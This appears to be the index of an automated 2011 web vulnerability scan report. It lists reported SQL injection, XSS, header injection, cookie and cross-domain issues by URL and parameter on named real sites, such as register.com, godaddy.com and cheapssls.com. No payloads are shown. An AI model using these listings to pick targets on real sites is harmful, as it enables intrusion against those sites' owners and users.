Stored XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, Blind SQL Injection, 09032011-02

Report generated by XSS.CX at Sat Sep 03 18:34:40 GMT-06:00 2011.


1. SQL injection

1.1. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]

1.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [uit cookie]

1.3. http://t4.trackalyzer.com/trackalyze.asp [i parameter]

1.4. http://www.cheapssls.com/index.php [REST URL parameter 1]

1.5. http://www.cheapssls.com/index.php [Referer HTTP header]

1.6. http://www.cheapssls.com/index.php [Referer HTTP header]

1.7. http://www.cheapssls.com/index.php [User-Agent HTTP header]

1.8. http://www.cheapssls.com/index.php [User-Agent HTTP header]

1.9. http://www.cheapssls.com/index.php [__utmb cookie]

1.10. http://www.cheapssls.com/index.php [stat_uniq_code cookie]

1.11. https://www.cheapssls.com/index.php [User-Agent HTTP header]

1.12. https://www.cheapssls.com/index.php [sgTrackerUserId cookie]

1.13. https://www.cheapssls.com/index.php [ve%5Bbrowser%5D parameter]

1.14. https://www.cheapssls.com/index.php [ve%5Bbrowser_version%5D parameter]

1.15. https://www.cheapssls.com/index.php [ve%5Bclient_language%5D parameter]

1.16. https://www.cheapssls.com/index.php [ve%5Bos%5D parameter]

1.17. https://www.cheapssls.com/index.php [ve%5Burl%5D parameter]

1.18. http://www.godaddy.com/gdshop/offers/cross_sell.asp [ASPSESSIONIDACSTCQTS cookie]

1.19. http://www.microcad.ca/cart/add/ [productid parameter]

1.20. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760 [REST URL parameter 3]

2. Cross-site scripting (stored)

3. HTTP header injection

3.1. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 2]

3.2. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 3]

3.3. http://www.wunderground.com/dotset.php [id parameter]

3.4. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]

4. Cross-site scripting (reflected)

4.1. http://feeds.feedburner.com/~s/meetup [i parameter]

4.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

4.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

4.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

4.5. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mbox parameter]

4.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mboxId parameter]

4.7. http://s29.sitemeter.com/js/counter.asp [site parameter]

4.8. http://s29.sitemeter.com/js/counter.js [site parameter]

4.9. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]

4.10. http://www.meetup.com/api/ [method parameter]

4.11. http://www.microcad.ca/cart/add/ [productid parameter]

4.12. http://www.register.com/css/home-optimized.css [REST URL parameter 1]

4.13. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 1]

4.14. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 2]

4.15. http://www.register.com/favicon.ico [REST URL parameter 1]

4.16. http://www.register.com/font/vag-bold.ttf [REST URL parameter 1]

4.17. http://www.register.com/font/vag-bold.woff [REST URL parameter 1]

4.18. http://www.register.com/images/sn/hp.xml [REST URL parameter 1]

4.19. http://www.register.com/js/aop-attach.js [REST URL parameter 1]

4.20. http://www.register.com/js/homepage-optimized.js [REST URL parameter 1]

4.21. http://www.register.com/js/jquery-1.3.2.min.js [REST URL parameter 1]

4.22. http://www.register.com/unauthenticated_session_expired.rcmx [REST URL parameter 1]

4.23. http://www.typepad.com/services/toolbar [autofollowed parameter]

4.24. http://www.register.com/ [Referer HTTP header]

4.25. http://www.register.com/domain/searchresults.rcmx [Referer HTTP header]

4.26. http://www.register.com/unauthenticated_session_expired.rcmx [Referer HTTP header]

5. Flash cross-domain policy

5.1. http://adx.adnxs.com/crossdomain.xml

5.2. http://ajax.googleapis.com/crossdomain.xml

5.3. http://bh.contextweb.com/crossdomain.xml

5.4. http://c.mouseflow.com/crossdomain.xml

5.5. http://c7.zedo.com/crossdomain.xml

5.6. http://cspix.media6degrees.com/crossdomain.xml

5.7. http://d.adroll.com/crossdomain.xml

5.8. http://d3.zedo.com/crossdomain.xml

5.9. http://d7.zedo.com/crossdomain.xml

5.10. http://ib.adnxs.com/crossdomain.xml

5.11. http://idcs.interclick.com/crossdomain.xml

5.12. http://imagesak.securepaynet.net/crossdomain.xml

5.13. http://img1.wsimg.com/crossdomain.xml

5.14. http://img3.wsimg.com/crossdomain.xml

5.15. http://m.adnxs.com/crossdomain.xml

5.16. http://registercom.tt.omtrdc.net/crossdomain.xml

5.17. http://s.gravatar.com/crossdomain.xml

5.18. http://segment-pixel.invitemedia.com/crossdomain.xml

5.19. http://value.register.com/crossdomain.xml

5.20. http://www.wunderground.com/crossdomain.xml

5.21. http://ads.lfstmedia.com/crossdomain.xml

5.22. http://edge.sharethis.com/crossdomain.xml

5.23. http://login.dotomi.com/crossdomain.xml

5.24. http://pagead2.googlesyndication.com/crossdomain.xml

5.25. http://w.sharethis.com/crossdomain.xml

5.26. http://www.godaddy.com/crossdomain.xml

5.27. https://www.godaddy.com/crossdomain.xml

5.28. http://www.youtube-nocookie.com/crossdomain.xml

5.29. http://stats.wordpress.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://stats.wordpress.com/clientaccesspolicy.xml

6.2. http://value.register.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://vasco.com/login.aspx

7.2. http://vasco.com/user_registration.aspx

8. Session token in URL

8.1. http://bh.contextweb.com/bh/set.aspx

8.2. http://l.sharethis.com/pview

8.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

8.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

8.5. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard

8.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard

8.7. http://research.microsoft.com/en-us/about/awards.aspx

8.8. http://research.microsoft.com/en-us/people/ajbrush/default.aspx

8.9. http://research.microsoft.com/en-us/um/people/ymwang/

8.10. http://www.facebook.com/extern/login_status.php

8.11. http://www.meetup.com/api/

8.12. http://www.register.com/css/home-optimized.css

8.13. http://www.register.com/js/aop-attach.js

8.14. http://www.register.com/js/homepage-optimized.js

8.15. http://www.register.com/js/jquery-1.3.2.min.js

9. ASP.NET ViewState without MAC enabled

9.1. https://www.sslmatrix.com/Order/quickorder

9.2. https://www.sslmatrix.com/ssl-promotion-code

9.3. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

10. Cookie scoped to parent domain

10.1. http://api.twitter.com/1/statuses/media_timeline.json

10.2. http://api.twitter.com/1/statuses/user_timeline.json

10.3. http://api.twitter.com/1/statuses/user_timeline/MSFTResearch.json

10.4. http://api.twitter.com/1/statuses/user_timeline/SharePoint.json

10.5. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json

10.6. http://api.twitter.com/1/trends/1.json

10.7. http://api.twitter.com/1/trends/available.json

10.8. http://api.twitter.com/1/urls/resolve.json

10.9. http://api.twitter.com/1/users/search.json

10.10. http://api.twitter.com/i/search/image_facets.json

10.11. http://api.twitter.com/i/search/video_facets.json

10.12. http://login.dotomi.com/ucm/UCMController

10.13. http://www.cheapssls.com/

10.14. http://www.cheapssls.com/index.php

10.15. http://adx.adnxs.com/mapuid

10.16. http://am.trafficmp.com/a/bpix

10.17. http://am.trafficmp.com/a/bpix

10.18. http://api.flickr.com/clientaccesspolicy.xml

10.19. http://b.scorecardresearch.com/b

10.20. http://b.scorecardresearch.com/r

10.21. http://bh.contextweb.com/bh/set.aspx

10.22. http://c7.zedo.com/img/bh.gif

10.23. https://cart.godaddy.com/basket.aspx

10.24. http://cf.addthis.com/red/p.json

10.25. http://cf.addthis.com/red/usync

10.26. http://cspix.media6degrees.com/orbserv/hbpix

10.27. http://d7.zedo.com/img/bh.gif

10.28. http://d7.zedo.com/img/bh.gif

10.29. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

10.30. http://ib.adnxs.com/getuid

10.31. http://ib.adnxs.com/seg

10.32. http://ib.adnxs.com/setuid

10.33. http://id.google.com/verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif

10.34. http://id.google.com/verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif

10.35. http://id.google.com/verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif

10.36. http://idcs.interclick.com/Segment.aspx

10.37. https://idp.godaddy.com/login.aspx

10.38. https://idp.godaddy.com/retrieveaccount.aspx

10.39. http://image2.pubmatic.com/AdServer/Pug

10.40. http://img.godaddy.com/image.aspx

10.41. http://img.godaddy.com/pageevents.aspx

10.42. http://m.adnxs.com/msftcookiehandler

10.43. https://mya.godaddy.com/

10.44. https://mya.godaddy.com/products/accountlist.aspx

10.45. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

10.46. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

10.47. http://pixel.adblade.com/imps.php

10.48. http://pixel.mathtag.com/event/img

10.49. http://pixel.mathtag.com/event/js

10.50. http://pixel.rubiconproject.com/tap.php

10.51. http://pixel.rubiconproject.com/tap.php

10.52. http://r.openx.net/set

10.53. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

10.54. http://segment-pixel.invitemedia.com/set_partner_uid

10.55. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

10.56. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

10.57. http://static.getclicky.com/js

10.58. http://www.godaddy.com/Payment/payment-options.aspx

10.59. http://www.godaddy.com/affiliates/affiliate-program.aspx

10.60. http://www.godaddy.com/gdshop/offers/cross_sell.asp

10.61. http://www.godaddy.com/shared/video/videos.aspx

10.62. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx

10.63. http://www.godaddy.com/ssl/ssl-certificates.aspx

10.64. http://www.register.com/css/basic.css

10.65. http://www.register.com/css/titan-screen.css

10.66. http://www.register.com/imgs/global/crtIcon.gif

10.67. http://www.register.com/imgs/global/registerLogo.gif

10.68. http://www.register.com/js/aop-attach.js

10.69. http://www.register.com/js/global.js

10.70. http://www.register.com/js/jquery-1.3.2.min.js

10.71. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js

10.72. http://www.register.com/js/jquery.cookie.js

10.73. http://www.register.com/js/jquery.jcarousellite.js

10.74. http://www.register.com/js/mbox.js

10.75. http://www.register.com/js/nicejforms.js

10.76. http://www.register.com/js/s_code.js

10.77. http://www.register.com/js/thickbox.js

11. Cookie without HttpOnly flag set

11.1. http://img.godaddy.com/image.aspx

11.2. http://img.godaddy.com/pageevents.aspx

11.3. http://login.dotomi.com/ucm/UCMController

11.4. http://www.cheapssls.com/

11.5. http://www.cheapssls.com/index.php

11.6. http://www.register.com/

11.7. http://www.register.com/domain/searchresults.rcmx

11.8. http://ad.yieldmanager.com/pixel

11.9. http://am.trafficmp.com/a/bpix

11.10. http://am.trafficmp.com/a/bpix

11.11. http://api.flickr.com/clientaccesspolicy.xml

11.12. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json

11.13. http://b.scorecardresearch.com/b

11.14. http://b.scorecardresearch.com/r

11.15. http://bh.contextweb.com/bh/set.aspx

11.16. http://c7.zedo.com/img/bh.gif

11.17. https://cart.godaddy.com/basket.aspx

11.18. http://cf.addthis.com/red/p.json

11.19. http://cf.addthis.com/red/usync

11.20. http://community.research.microsoft.com/

11.21. http://cspix.media6degrees.com/orbserv/hbpix

11.22. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

11.23. http://d7.zedo.com/img/bh.gif

11.24. http://d7.zedo.com/img/bh.gif

11.25. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

11.26. http://idcs.interclick.com/Segment.aspx

11.27. https://idp.godaddy.com/login.aspx

11.28. https://idp.godaddy.com/retrieveaccount.aspx

11.29. http://image2.pubmatic.com/AdServer/Pug

11.30. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg

11.31. http://microsoftcambridge.com/Portals/0/portal.css

11.32. http://microsoftcambridge.com/Portals/0/rss.png

11.33. http://microsoftcambridge.com/Portals/0/search_results.png

11.34. http://microsoftcambridge.com/Portals/0/share_icons_new.png

11.35. http://microsoftcambridge.com/Portals/_default/Skins/working/skin.css

11.36. http://microsoftcambridge.com/Portals/_default/default.css

11.37. http://microsoftcambridge.com/Resources/Shared/scripts/initWidgets.js

11.38. http://microsoftcambridge.com/css/print.css

11.39. http://microsoftcambridge.com/css/styles.css

11.40. http://microsoftcambridge.com/img/working/about.png

11.41. http://microsoftcambridge.com/img/working/blog.png

11.42. http://microsoftcambridge.com/img/working/community.png

11.43. http://microsoftcambridge.com/img/working/events.png

11.44. http://microsoftcambridge.com/img/working/people.png

11.45. http://microsoftcambridge.com/img/working/teams.png

11.46. http://microsoftcambridge.com/img/working/working.png

11.47. http://microsoftcambridge.com/js/dnn.js

11.48. http://microsoftcambridge.com/js/dnn.xml.js

11.49. http://microsoftcambridge.com/js/dnn.xmlhttp.js

11.50. http://microsoftcambridge.com/js/dnncore.js

11.51. http://microsoftcambridge.com/js/jfeed.js

11.52. http://microsoftcambridge.com/js/jquery.js

11.53. http://microsoftcambridge.com/js/siteo.js

11.54. http://microsoftcambridge.com/js/twitter.min.js

11.55. http://microsoftcambridge.com/js/ui.js

11.56. https://mya.godaddy.com/

11.57. https://mya.godaddy.com/products/accountlist.aspx

11.58. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

11.59. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

11.60. http://pixel.adblade.com/imps.php

11.61. http://pixel.mathtag.com/event/img

11.62. http://pixel.mathtag.com/event/js

11.63. http://pixel.rubiconproject.com/tap.php

11.64. http://pixel.rubiconproject.com/tap.php

11.65. http://r.openx.net/set

11.66. http://research.microsoft.com/apps/search/search.ashx

11.67. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

11.68. http://segment-pixel.invitemedia.com/set_partner_uid

11.69. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

11.70. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

11.71. http://static.getclicky.com/js

11.72. http://t4.trackalyzer.com/trackalyze.asp

11.73. http://www.cheapssls.com/index.php

11.74. https://www.cheapssls.com/index.php

11.75. http://www.godaddy.com/Payment/payment-options.aspx

11.76. http://www.godaddy.com/affiliates/affiliate-program.aspx

11.77. http://www.godaddy.com/gdshop/offers/cross_sell.asp

11.78. http://www.godaddy.com/shared/video/videos.aspx

11.79. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx

11.80. http://www.godaddy.com/ssl/ssl-certificates.aspx

11.81. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc

11.82. http://www.register.com/css/basic.css

11.83. http://www.register.com/css/titan-screen.css

11.84. http://www.register.com/favicon.ico

11.85. http://www.register.com/imgs/global/btnChooseAPackage_on.gif

11.86. http://www.register.com/imgs/global/btnFindIt_on.gif

11.87. http://www.register.com/imgs/global/crtIcon.gif

11.88. http://www.register.com/imgs/global/registerLogo.gif

11.89. http://www.register.com/js/aop-attach.js

11.90. http://www.register.com/js/global.js

11.91. http://www.register.com/js/jquery-1.3.2.min.js

11.92. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js

11.93. http://www.register.com/js/jquery.cookie.js

11.94. http://www.register.com/js/jquery.jcarousellite.js

11.95. http://www.register.com/js/mbox.js

11.96. http://www.register.com/js/nicejforms.js

11.97. http://www.register.com/js/s_code.js

11.98. http://www.register.com/js/thickbox.js

12. Password field with autocomplete enabled

12.1. https://cart.godaddy.com/basket.aspx

12.2. https://idp.godaddy.com/login.aspx

12.3. https://idp.godaddy.com/login.aspx

12.4. https://idp.godaddy.com/login.aspx

12.5. https://idp.godaddy.com/login.aspx

12.6. https://idp.godaddy.com/login.aspx

12.7. https://idp.godaddy.com/login.aspx

12.8. https://idp.godaddy.com/login.aspx

12.9. https://idp.godaddy.com/retrieveaccount.aspx

12.10. https://idp.godaddy.com/retrieveaccount.aspx

12.11. http://twitter.com/

12.12. http://twitter.com/

12.13. http://twitter.com/

12.14. http://vasco.com/login.aspx

12.15. http://vasco.com/user_registration.aspx

12.16. https://www.cheapssls.com/index.php

12.17. http://www.godaddy.com/Payment/payment-options.aspx

12.18. http://www.godaddy.com/affiliates/affiliate-program.aspx

12.19. http://www.godaddy.com/gdshop/offers/cross_sell.asp

12.20. http://www.godaddy.com/ssl/ssl-certificates.aspx

12.21. http://www.godaddy.com/ssl/ssl-certificates.aspx

12.22. http://www.meetup.com/

12.23. http://www.meetup.com/

12.24. http://www.meetup.com/Boston-BizSpark-Meetup/

12.25. http://www.meetup.com/Boston-BizSpark-Meetup/

12.26. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/

12.27. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/

12.28. http://www.meetup.com/sponsorships/

12.29. http://www.meetup.com/sponsorships/

12.30. http://www.meetup.com/whats_new/

12.31. http://www.meetup.com/whats_new/

12.32. https://www.microcad.ca/auth/login

12.33. https://www.sslmatrix.com/Order/quickorder

12.34. https://www.sslmatrix.com/Order/quickorder

12.35. https://www.sslmatrix.com/ssl-promotion-code

12.36. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

13. Source code disclosure

13.1. https://platform.linkedin.com/js/secureAnonymousFramework

13.2. http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx

13.3. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx

13.4. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx

13.5. http://research.microsoft.com/en-us/um/people/yongrui/

13.6. http://vasco.com/

13.7. http://vasco.com/login.aspx

13.8. http://www.register.com/font/vag-bold.woff

13.9. http://www.vasco.com/

14. Referer-dependent response

14.1. http://fast.fonts.com/d/e93ee223-5d52-4bdf-a113-c6c4c8936824.woff

14.2. https://idp.godaddy.com/login.aspx

14.3. http://seal.digicert.com/custsupport/sealtable.php

14.4. http://www.cheapssls.com/

14.5. http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html

14.6. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html

14.7. http://www.facebook.com/plugins/like.php

14.8. http://www.godaddy.com/shared/video/videos.aspx

14.9. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc

14.10. http://www.register.com/unauthenticated_session_expired.rcmx

15. Cross-domain POST

16. SSL cookie without secure flag set

16.1. https://cart.godaddy.com/basket.aspx

16.2. https://idp.godaddy.com/login.aspx

16.3. https://idp.godaddy.com/retrieveaccount.aspx

16.4. https://mya.godaddy.com/

16.5. https://mya.godaddy.com/products/accountlist.aspx

16.6. https://support.microsoft.com/contactus/emailcontact.aspx

16.7. https://www.cheapssls.com/index.php

16.8. https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx

17. Cross-domain Referer leakage

17.1. http://assets.tumblr.com/iframe.html

17.2. https://careers.microsoft.com/Resumes.aspx

17.3. https://cart.godaddy.com/basket.aspx

17.4. http://cm.g.doubleclick.net/pixel

17.5. http://cm.g.doubleclick.net/pixel

17.6. http://dg.specificclick.net/

17.7. http://googleads.g.doubleclick.net/pagead/ads

17.8. http://googleads.g.doubleclick.net/pagead/ads

17.9. http://googleads.g.doubleclick.net/pagead/ads

17.10. http://googleads.g.doubleclick.net/pagead/ads

17.11. https://idp.godaddy.com/login.aspx

17.12. https://idp.godaddy.com/retrieveaccount.aspx

17.13. http://mediacdn.disqus.com/1314991730/build/system/disqus.js

17.14. http://microsoftcambridge.com/Search/tabid/722/Default.aspx

17.15. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.16. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1483365740@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.17. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1617096016@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.18. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1629838351@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.19. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1911929966@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.20. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1574699949@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3

17.21. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1717083331@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3

17.22. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.23. http://research.microsoft.com/Search

17.24. http://research.microsoft.com/apps/dp/search.aspx

17.25. http://research.microsoft.com/apps/pubs/default.aspx

17.26. http://research.microsoft.com/apps/search/videosearch.ashx

17.27. http://research.microsoft.com/apps/video/default.aspx

17.28. http://s7.addthis.com/js/250/addthis_widget.js

17.29. https://support.microsoft.com/contactus/emailcontact.aspx

17.30. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

17.31. http://www.cheapssls.com/

17.32. http://www.cheapssls.com/index.php

17.33. https://www.cheapssls.com/

17.34. https://www.cheapssls.com/index.php

17.35. https://www.cheapssls.com/index.php

17.36. http://www.diginotar.com/SearchResults/tabid/37/Default.aspx

17.37. http://www.godaddy.com/Payment/payment-options.aspx

17.38. http://www.godaddy.com/gdshop/offers/cross_sell.asp

17.39. http://www.godaddy.com/ssl/ssl-certificates.aspx

17.40. http://www.google.com/maps

17.41. http://www.google.com/search

17.42. http://www.google.com/search

17.43. http://www.google.com/url

17.44. http://www.google.com/url

17.45. http://www.google.com/url

17.46. http://www.google.com/url

17.47. http://www.google.com/url

17.48. http://www.google.com/url

17.49. http://www.google.com/url

17.50. http://www.google.com/url

17.51. http://www.google.com/url

17.52. http://www.google.com/url

17.53. http://www.hostnj.net/

17.54. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

17.55. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

17.56. http://www.microsoft-careers.com/search

17.57. https://www.microsoft-careers.com/find.job

17.58. https://www.microsoft-careers.com/talentcommunity/subscribe/

17.59. http://www.register.com/domain/searchresults.rcmx

17.60. http://www.register.com/unauthenticated_session_expired.rcmx

17.61. https://www.sslmatrix.com/Order/quickorder

18. Cross-domain script include

18.1. http://assets.tumblr.com/iframe.html

18.2. https://cart.godaddy.com/basket.aspx

18.3. http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

18.4. http://geom2.com/

18.5. http://googleads.g.doubleclick.net/pagead/ads

18.6. http://googleads.g.doubleclick.net/pagead/ads

18.7. https://idp.godaddy.com/login.aspx

18.8. https://idp.godaddy.com/retrieveaccount.aspx

18.9. http://meetupblog.meetup.com/

18.10. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

18.11. http://research.microsoft.com/Search

18.12. http://research.microsoft.com/apps/dp/areas.aspx

18.13. http://research.microsoft.com/apps/dp/blank.jpg

18.14. http://research.microsoft.com/apps/dp/dl/downloads.aspx

18.15. http://research.microsoft.com/apps/dp/downloads.aspx

18.16. http://research.microsoft.com/apps/dp/ev/events.aspx

18.17. http://research.microsoft.com/apps/dp/gr/groups.aspx

18.18. http://research.microsoft.com/apps/dp/groups.aspx

18.19. http://research.microsoft.com/apps/dp/i/reverse_

18.20. http://research.microsoft.com/apps/dp/ne/news.aspx

18.21. http://research.microsoft.com/apps/dp/news.aspx

18.22. http://research.microsoft.com/apps/dp/pe/people.aspx

18.23. http://research.microsoft.com/apps/dp/pr/projects.aspx

18.24. http://research.microsoft.com/apps/dp/projects.aspx

18.25. http://research.microsoft.com/apps/dp/pu/publications.aspx

18.26. http://research.microsoft.com/apps/dp/search.aspx

18.27. http://research.microsoft.com/apps/dp/vi/videos.aspx

18.28. http://research.microsoft.com/apps/pubs/default.aspx

18.29. http://research.microsoft.com/apps/search/videosearch.ashx

18.30. http://research.microsoft.com/apps/video/default.aspx

18.31. http://research.microsoft.com/en-us/about/awards.aspx

18.32. http://research.microsoft.com/en-us/about/brochure-1.aspx

18.33. http://research.microsoft.com/en-us/about/brochure-2.aspx

18.34. http://research.microsoft.com/en-us/about/brochure-3.aspx

18.35. http://research.microsoft.com/en-us/about/brochure-4.aspx

18.36. http://research.microsoft.com/en-us/about/brochure-5.aspx

18.37. http://research.microsoft.com/en-us/about/brochure-6.aspx

18.38. http://research.microsoft.com/en-us/about/brochure-7.aspx

18.39. http://research.microsoft.com/en-us/about/brochure-8.aspx

18.40. http://research.microsoft.com/en-us/about/brochure-9.aspx

18.41. http://research.microsoft.com/en-us/about/contactus.aspx

18.42. http://research.microsoft.com/en-us/about/default.aspx

18.43. http://research.microsoft.com/en-us/about/directors.aspx

18.44. http://research.microsoft.com/en-us/about/feature/downloads.aspx

18.45. http://research.microsoft.com/en-us/about/paperawards.aspx

18.46. http://research.microsoft.com/en-us/collaboration/about/default.aspx

18.47. http://research.microsoft.com/en-us/collaboration/about/events.aspx

18.48. http://research.microsoft.com/en-us/collaboration/about/projects.aspx

18.49. http://research.microsoft.com/en-us/collaboration/about/summits.aspx

18.50. http://research.microsoft.com/en-us/collaboration/awards/default.aspx

18.51. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx

18.52. http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx

18.53. http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx

18.54. http://research.microsoft.com/en-us/collaboration/bg_txt.png

18.55. http://research.microsoft.com/en-us/collaboration/default.aspx

18.56. http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx

18.57. http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx

18.58. http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx

18.59. http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx

18.60. http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx

18.61. http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx

18.62. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx

18.63. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx

18.64. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx

18.65. http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx

18.66. http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx

18.67. http://research.microsoft.com/en-us/collaboration/global/india/default.aspx

18.68. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx

18.69. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx

18.70. http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx

18.71. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx

18.72. http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx

18.73. http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx

18.74. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx

18.75. http://research.microsoft.com/en-us/collaboration/institutes/default.aspx

18.76. http://research.microsoft.com/en-us/collaboration/tools/default.aspx

18.77. http://research.microsoft.com/en-us/community/default.aspx

18.78. http://research.microsoft.com/en-us/default.aspx

18.79. http://research.microsoft.com/en-us/events/escience2011/

18.80. http://research.microsoft.com/en-us/events/indiaschooljune2011/

18.81. http://research.microsoft.com/en-us/events/women-in-computing2011/

18.82. http://research.microsoft.com/en-us/jobs/default.aspx

18.83. http://research.microsoft.com/en-us/jobs/fulltime/default.aspx

18.84. http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx

18.85. http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx

18.86. http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx

18.87. http://research.microsoft.com/en-us/jobs/intern/about_india.aspx

18.88. http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx

18.89. http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx

18.90. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx

